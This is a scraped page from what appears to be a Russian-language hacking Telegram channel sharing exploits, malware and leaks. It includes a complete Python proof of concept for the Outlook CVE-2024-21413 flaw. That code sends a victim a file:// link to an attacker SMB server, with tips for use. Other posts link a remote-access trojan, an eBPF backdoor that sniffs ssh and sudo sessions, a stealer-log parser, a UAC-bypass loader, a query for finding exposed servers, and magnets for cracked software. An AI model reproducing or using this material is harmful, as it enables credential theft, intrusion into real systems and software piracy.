Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
берегите котиков
*
#bilet
🔥79👍8😱2
CVE-2024-40348
*
Bazaar < v1.4.3 обход каталога
*
POC+scanner
*
🔥16
Meta LLaMA 3.1 Нейроночка
*
764GiB после распаковки~820GB
magnet:?xt=urn:btih:c0e342ae5677582f92c52d8019cc32e1f86f1d83&dn=miqu-2&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80

*
😱31🔥13👍9
СVE-2024-39907
CVSS 9.8
Ошибка SQLi подвергает пользователей 1Panel удаленному захвату
*
POC exploit
*
FOFA Query: icon_hash="1300107149" || icon_hash="1453309674" || http://cert.issuer.cn="1Panel Intermediate CA"

FOFA Link: пыщь

#1panel #china
🔥12👍2
CVE-2024-41107.py
3.4 KB
CVE-2024-41107
*
Apache CloudStack
*
Версии с 4.5.0 по 4.18.2.1 и с 4.19.0.0 по 4.19.0.2.
*
Дырка в механизме аутентификации SAML
*
Для админов\white: saml2.enabled заменить на saml2.false бгг))

#apache #saml
👍9🔥2
PumpBin
*
Собирайте offensive имплатны, шаблоны, подгружайте в свои C2\C&C
Но помните, ровно в полночь - дадут бинарём в тыкву
*
Скачать тут
*
Документация тут

🎃
🔥21👍10😱3
Linux Shellcoding
*
Избегайте нулевых байтов \\x00 в шеллкодесах !!!
*
Щелкнуть орешек знаний тут

#linux #redteam
👍10🔥3
Плащ невидимка для linux процессов
*
В программе:
Аномальное монтирование
Пустые каталоги в которых есть жизнь
Заплывы с sTrace
Форензика одной ладошкой
*
Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic

#redteam #linux #proc
🔥13👍6
Media is too big
VIEW IN TELEGRAM
Поздравляем с днем системного администратора 2024
*
и смотрим классику 😏

#sysadminDAY
🔥59👍9
eBPF based kernel backdoor
*
Снифинг ssh/sudo/su/login/passwd сессий
*
download

#ebpf #linux
👍9🔥5
Xeno Rat
*
Опенсорсный РАТник, написан на C# и совместим с Windows 10, 11
*
Крыса умеет:
HVNC
Live Microphoneand camera
Socks5 Reverse Proxy
Regular Updates and Much More (ну тут сомнительно)
Built Completely from Scratch (скорее минус чем плюс)
UAC bypass (хммм)
Fun menu (праздник для души и мёд для ушей)
ну и куча всего

download крысу

#RAT #funny
🔥14👍8😱1
BreachForum Party !!!

В программе:
Канье Уэст и агенты FBI
BugBounty с паяльником
Ряженные cisco talos
И мерч в полоску
Вы приходите
😆

#breachforum
👍15🔥5😱1
👍9🔥6
Certified Ethical Hacker (CEH) v11
*
38 GB
*
download
🔥38👍7
Пишем stealer logs parser
*
WriteUp
*
SourceCode (template)
🔥16👍8
2024-21413 /outlook RCE
*
POC

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def send_email():
# Get user input for sender's email address and password
sender_email = input("Enter your Outlook email address: ")
sender_password = input("Enter your Outlook email password: ")

# Get user input for receiver's email address
receiver_email = input("Enter the recipient's email address: ")

# Create a new message object
msg = MIMEMultipart()

# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input("Enter email subject: ")

# Ask user if they want to add a link attachment
add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
if add_attachment == 'yes':
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
</body>
</html>"""
msg.attach(MIMEText(html_content, 'html'))

# Connect to SMTP server and send email
with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print("Email sent successfully.")

if __name__ == "__main__":
send_email()


Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на rtf например)
2. На линк жертве кликать не нужно, Office Protected View все сам сделает.
3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока port established

#outглюк #ntlm2
🔥18👍10
Binary Ninja 4.1 Final + crack
*
(Linux+windows+Mac версии)
*
magnet link
magnet:?xt=urn:btih:c392c1aab1786180413167e3b8345f0f9d1fc8c4&dn=binja_release_6
👍21
👍30🔥10😱6
.NET PROFILER DLL LOADING
*
Эксплойт загружает вредоносную DLL с помощью планировщика задач (MMC) для обхода UAC и получения прав администратора.
👍13🔥1